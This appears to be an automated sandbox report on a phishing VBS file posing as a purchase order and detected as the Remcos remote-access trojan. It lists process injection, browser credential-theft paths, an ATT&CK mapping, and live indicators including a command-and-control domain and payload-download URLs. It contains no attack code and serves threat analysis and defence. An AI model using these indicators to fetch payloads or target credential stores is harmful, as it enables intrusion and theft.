Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: EnumSystemLocalesW,	11_2_0044F216
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	11_2_0044F2A3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: GetLocaleInfoA,	11_2_0040E2BB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: GetLocaleInfoW,	11_2_0044F4F3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	11_2_0044F61C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: GetLocaleInfoW,	11_2_0044F723
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	11_2_0044F7F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: EnumSystemLocalesW,	11_2_00445914
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: GetLocaleInfoW,	11_2_00445E1C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	11_2_0044EEB8

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Code function: 11_2_00404F31 GetLocalTime,CreateEventA,CreateThread,

11_2_00404F31

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Code function: 11_2_004195F8 GetComputerNameExW,GetUserNameW,

11_2_004195F8

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Code function: 11_2_004466BF _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,

11_2_004466BF

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Remcos RAT

Source: Yara match	File source: 8.2.powershell.exe.1b057622410.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.powershell.exe.1b057622410.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.2645775493.0000000000A18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2646574192.000000000262E000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1575148283.000001B056132000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1575148283.000001B0571DA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 8080, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AddInProcess32.exe PID: 7444, type: MEMORYSTR

Contains functionality to steal Chrome passwords or cookies

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data

11_2_0040A953

Contains functionality to steal Firefox passwords or cookies

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\		11_2_0040AA71
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: \key3.db		11_2_0040AA71

Remote Access Functionality

Yara detected Remcos RAT

Source: Yara match	File source: 8.2.powershell.exe.1b057622410.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.powershell.exe.1b057622410.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.2645775493.0000000000A18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2646574192.000000000262E000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1575148283.000001B056132000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1575148283.000001B0571DA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 8080, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AddInProcess32.exe PID: 7444, type: MEMORYSTR

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Code function: cmd.exe

11_2_0040567A

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	221 Scripting	Valid Accounts	1 Native API	221 Scripting	1 DLL Side-Loading	11 Deobfuscate/Decode Files or Information	1 OS Credential Dumping	2 System Time Discovery	Remote Services	11 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Exploitation for Client Execution	1 DLL Side-Loading	1 Access Token Manipulation	3 Obfuscated Files or Information	211 Input Capture	1 Account Discovery	Remote Desktop Protocol	211 Input Capture	12 Ingress Tool Transfer	Exfiltration Over Bluetooth	1 Defacement
Email Addresses	DNS Server	Domain Accounts	12 Command and Scripting Interpreter	1 Windows Service	1 Windows Service	1 Software Packing	2 Credentials In Files	1 System Service Discovery	SMB/Windows Admin Shares	3 Clipboard Data	21 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	2 Service Execution	Login Hook	222 Process Injection	1 DLL Side-Loading	NTDS	4 File and Directory Discovery	Distributed Component Object Model	Input Capture	1 Non-Standard Port	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	3 PowerShell	Network Logon Script	Network Logon Script	21 Virtualization/Sandbox Evasion	LSA Secrets	33 System Information Discovery	SSH	Keylogging	2 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Access Token Manipulation	Cached Domain Credentials	21 Security Software Discovery	VNC	GUI Input Capture	23 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	222 Process Injection	DCSync	21 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	3 Process Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	HTML Smuggling	/etc/passwd and /etc/shadow	1 Application Window Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	Dynamic API Resolution	Network Sniffing	1 System Owner/User Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	Stripped Payloads	Input Capture	1 Remote System Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption
Gather Victim Org Information	DNS Server	Compromise Software Supply Chain	Windows Command Shell	Scheduled Task	Scheduled Task	Embedded Payloads	Keylogging	1 System Network Configuration Discovery	Taint Shared Content	Screen Capture	DNS	Exfiltration Over Physical Medium	Resource Hijacking

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Purchase Order - PO14895.vbs	6%	Virustotal		Browse

Source	Detection	Scanner	Link
paste.ee	1%	Virustotal	Browse
raw.githubusercontent.com	0%	Virustotal	Browse
ab9001.ddns.net	16%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
http://nuget.org/NuGet.exe	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
https://go.micro	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
https://aka.ms/pscore6	0%	URL Reputation	safe
http://geoplugin.net/json.gp	0%	URL Reputation	safe
http://geoplugin.net/json.gp/C	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://nuget.org/nuget.exe	0%	URL Reputation	safe
https://oneget.orgX	0%	URL Reputation	safe
https://aka.ms/pscore68	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://oneget.org	0%	URL Reputation	safe
https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt	6%	Virustotal		Browse
http://paste.ee	1%	Virustotal		Browse
ab9001.ddns.net	16%	Virustotal		Browse
http://www.apache.org/licenses/LICENSE-2.0	0%	Virustotal		Browse
http://www.apache.org/licenses/LICENSE-2.0.html	0%	Virustotal		Browse
https://analytics.paste.ee	1%	Virustotal		Browse
https://github.com/Pester/Pester	1%	Virustotal		Browse
https://www.google.com	0%	Virustotal		Browse
https://raw.githubusercontent.com	0%	Virustotal		Browse
https://cdnjs.cloudflare.com	0%	Virustotal		Browse
https://paste.ee	1%	Virustotal		Browse
http://raw.githubusercontent.com	0%	Virustotal		Browse
https://secure.gravatar.com	0%	Virustotal		Browse
https://themes.googleusercontent.com	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
paste.ee	188.114.96.3	true	true	1%, Virustotal, Browse	unknown
raw.githubusercontent.com	185.199.108.133	true	false	0%, Virustotal, Browse	unknown
ab9001.ddns.net	45.133.172.96	true	true	16%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt	false	6%, Virustotal, Browse	unknown
https://paste.ee/d/5vQgr/0	true		unknown
ab9001.ddns.net	true	16%, Virustotal, Browse	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nuget.org/NuGet.exe	powershell.exe, 00000008.00000002.1550060124.000001B047B5E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1575148283.000001B056132000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0	powershell.exe, 00000008.00000002.1550060124.000001B0477F1000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000008.00000002.1550060124.000001B0462E2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
http://paste.ee	powershell.exe, 00000008.00000002.1550060124.000001B0465DA000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000008.00000002.1550060124.000001B0462E2000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://go.micro	powershell.exe, 00000008.00000002.1550060124.000001B04702C000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/License	powershell.exe, 00000008.00000002.1575148283.000001B056132000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.google.com;	powershell.exe, 00000008.00000002.1550060124.000001B0465DA000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://contoso.com/Icon	powershell.exe, 00000008.00000002.1575148283.000001B056132000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://raw.githubusercont	powershell.exe, 00000008.00000002.1550060124.000001B0477A2000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://analytics.paste.ee	powershell.exe, 00000008.00000002.1550060124.000001B0465DA000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse	unknown
https://paste.ee	powershell.exe, 00000008.00000002.1550060124.000001B046516000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse	unknown
https://aka.ms/pscore6	powershell.exe, 00000005.00000002.1474559091.000001CE815CB000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 00000008.00000002.1550060124.000001B0462E2000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse	unknown
http://geoplugin.net/json.gp	AddInProcess32.exe	false	URL Reputation: safe	unknown
https://www.google.com	powershell.exe, 00000008.00000002.1550060124.000001B0465DA000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://raw.githubusercontent.com	powershell.exe, 00000008.00000002.1550060124.000001B04702C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1550060124.000001B0462E2000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
http://geoplugin.net/json.gp/C	powershell.exe, 00000008.00000002.1575148283.000001B056132000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1575148283.000001B0571DA000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/	powershell.exe, 00000008.00000002.1575148283.000001B056132000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000008.00000002.1550060124.000001B047B5E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1575148283.000001B056132000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://raw.githubusercontent.com	powershell.exe, 00000008.00000002.1550060124.000001B0477A8000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://oneget.orgX	powershell.exe, 00000008.00000002.1550060124.000001B0477F1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://analytics.paste.ee;	powershell.exe, 00000008.00000002.1550060124.000001B0465DA000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://cdnjs.cloudflare.com	powershell.exe, 00000008.00000002.1550060124.000001B0465DA000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://aka.ms/pscore68	powershell.exe, 00000005.00000002.1474559091.000001CE81619000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1628137631.000002468005E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1628137631.000002468004B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1550060124.000001B0460C1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdnjs.cloudflare.com;	powershell.exe, 00000008.00000002.1550060124.000001B0465DA000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000005.00000002.1474559091.000001CE8164B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1628137631.0000024680105000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1550060124.000001B0460C1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://secure.gravatar.com	powershell.exe, 00000008.00000002.1550060124.000001B0465DA000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://themes.googleusercontent.com	powershell.exe, 00000008.00000002.1550060124.000001B0465DA000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://oneget.org	powershell.exe, 00000008.00000002.1550060124.000001B0477F1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txtYQD;	powershell.exe, 00000008.00000002.1550060124.000001B0462E2000.00000004.00000800.00020000.00000000.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
188.114.96.3	paste.ee	European Union	13335	CLOUDFLARENETUS	true
185.199.108.133	raw.githubusercontent.com	Netherlands	54113	FASTLYUS	false
45.133.172.96	ab9001.ddns.net	United Kingdom	206990	NOIANETWORKGI	true

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1524801
Start date and time:	2024-10-03 09:26:32 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 21s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	15
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Purchase Order - PO14895.vbs
Detection:	MAL
Classification:	mal100.rans.troj.spyw.expl.evad.winVBS@17/8@4/4
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 100% Number of executed functions: 46 Number of non-executed functions: 175
Cookbook Comments:	Found application associated with file extension: .vbs

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target powershell.exe, PID 7864 because it is empty
Execution Graph export aborted for target powershell.exe, PID 7964 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
03:27:39	API Interceptor	44x Sleep call for process: powershell.exe modified
03:28:17	API Interceptor	1829008x Sleep call for process: AddInProcess32.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
188.114.96.3	1tstvk3Sls.exe	Get hash	malicious	RHADAMANTHYS	Browse	microsoft-rage.world/Api/v3/qjqzqiiqayjq
	http://Asm.alcateia.org	Get hash	malicious	HTMLPhisher	Browse	asm.alcateia.org/
	hbwebdownload - MT 103.exe	Get hash	malicious	FormBook	Browse	www.j88.travel/c24t/?Edg8Tp=iDjdFciE5wc5h9D9V74ZS/2sliUdDJEhqWnTSCKxgeFtQoD7uajT9bZ2+lW3g3vOrk23&iL30=-ZRd9JBXfLe8q2J
	z4Shipping_document_pdf.exe	Get hash	malicious	FormBook	Browse	www.bayarcepat19.click/g48c/
	update SOA.exe	Get hash	malicious	FormBook	Browse	www.bayarcepat19.click/5hcm/
	docs.exe	Get hash	malicious	FormBook	Browse	www.j88.travel/c24t/?I6=iDjdFciE5wc5h9D9V74ZS/2sliUdDJEhqWnTSCKxgeFtQoD7uajT9bZ2+la3znjNy02hfQbCEg==&AL0=9rN46F
	https://wwvmicrosx.live/office365/office_cookies/main	Get hash	malicious	HTMLPhisher	Browse	wwvmicrosx.live/office365/office_cookies/main/
	http://fitur-dana-terbaru-2024.pages.dev/	Get hash	malicious	HTMLPhisher	Browse	fitur-dana-terbaru-2024.pages.dev/favicon.ico
	http://mobilelegendsmycode.com/	Get hash	malicious	Unknown	Browse	mobilelegendsmycode.com/favicon.ico
	http://instructionhub.net/?gad_source=2&gclid=EAIaIQobChMI-pqSm7HgiAMVbfB5BB3YEjS_EAAYASAAEgJAAPD_BwE	Get hash	malicious	WinSearchAbuse	Browse	download.all-instructions.com/Downloads/Instruction%2021921.pdf.lnk
185.199.108.133	http://www.freemangas.com	Get hash	malicious	Unknown	Browse
	SHIPPING_DOCUMENTS.VBS.vbs	Get hash	malicious	FormBook	Browse
	NhtSITq9Zp.vbs	Get hash	malicious	Remcos	Browse
	risTLdc664.vbs	Get hash	malicious	FormBook	Browse
	uLfuBVyZFV.vbs	Get hash	malicious	Unknown	Browse
	iJEK0xwucj.vbs	Get hash	malicious	Unknown	Browse
	mitec_purchase_order_PDF (1).vbs	Get hash	malicious	PXRECVOWEIWOEI Stealer	Browse
	http://detection.fyi	Get hash	malicious	NetSupport RAT, Lsass Dumper, Mimikatz, Nukesped, Quasar, Trickbot, Xmrig	Browse
	asegura.vbs	Get hash	malicious	Remcos	Browse
	tCNVKM4mkt.exe	Get hash	malicious	PureLog Stealer, XWorm	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
raw.githubusercontent.com	https://www.diamondsbyeden.com/	Get hash	malicious	Unknown	Browse	185.199.111.133
	https://www.diamondsbyeden.com/	Get hash	malicious	Unknown	Browse	185.199.111.133
	http://fpnc.vnvrff.com/	Get hash	malicious	Unknown	Browse	185.199.111.133
	http://www.freemangas.com	Get hash	malicious	Unknown	Browse	185.199.108.133
	http://freemangas.com	Get hash	malicious	Unknown	Browse	185.199.110.133
	SHIPPING_DOCUMENTS.VBS.vbs	Get hash	malicious	FormBook	Browse	185.199.108.133
	NhtSITq9Zp.vbs	Get hash	malicious	Remcos	Browse	185.199.108.133
	ejdc7iP3A7.vbs	Get hash	malicious	Remcos	Browse	185.199.109.133
	risTLdc664.vbs	Get hash	malicious	FormBook	Browse	185.199.108.133
	uLfuBVyZFV.vbs	Get hash	malicious	Unknown	Browse	185.199.108.133
paste.ee	sostener.vbs	Get hash	malicious	Njrat	Browse	188.114.97.3
	sostener.vbs	Get hash	malicious	XWorm	Browse	188.114.96.3
	NhtSITq9Zp.vbs	Get hash	malicious	Remcos	Browse	188.114.96.3
	risTLdc664.vbs	Get hash	malicious	FormBook	Browse	188.114.97.3
	NTiwJrX4R4.vbs	Get hash	malicious	Remcos, PureLog Stealer	Browse	188.114.97.3
	o45q0zbdwt.vbs	Get hash	malicious	PureLog Stealer	Browse	188.114.97.3
	OIQ1ybtQdW.vbs	Get hash	malicious	Remcos, PureLog Stealer	Browse	188.114.96.3
	1iH5ABLKIA.vbs	Get hash	malicious	AsyncRAT, DcRat, PureLog Stealer	Browse	188.114.96.3
	vr65co3Boo.vbs	Get hash	malicious	AsyncRAT, DcRat, PureLog Stealer	Browse	188.114.97.3
	qiEmGNhUij.vbs	Get hash	malicious	AsyncRAT, DcRat, PureLog Stealer	Browse	188.114.96.3
ab9001.ddns.net	Faktura.vbs	Get hash	malicious	Remcos	Browse	64.188.16.157
	1722601625e1f9a4f530f6395665807ae8da7c9d13076e57dbdc05cedb2ad13cd85af8a931941.dat-decoded.exe	Get hash	malicious	Remcos	Browse	64.188.16.157
	PO#2195112.vbs	Get hash	malicious	Remcos	Browse	64.188.16.157
	BL-RTM1439068.vbs	Get hash	malicious	GuLoader, Remcos	Browse	64.188.16.157
	SWIFT 103 202405291545524610 290524.vbs	Get hash	malicious	GuLoader, Remcos	Browse	94.156.64.200
	Swift mt103 483932024.vbs	Get hash	malicious	GuLoader, Remcos	Browse	94.156.67.228
	Forandringsstnings.vbs	Get hash	malicious	GuLoader, Remcos	Browse	94.156.67.228

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	DHL Receipt_AWB 9892671327.xls	Get hash	malicious	Unknown	Browse	172.67.216.244
	GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	Comprobante.lnk.lnk	Get hash	malicious	Lokibot	Browse	188.114.97.3
	Payment proof.xls	Get hash	malicious	Unknown	Browse	172.67.216.244
	Comprobante.lnk.lnk	Get hash	malicious	Lokibot	Browse	188.114.96.3
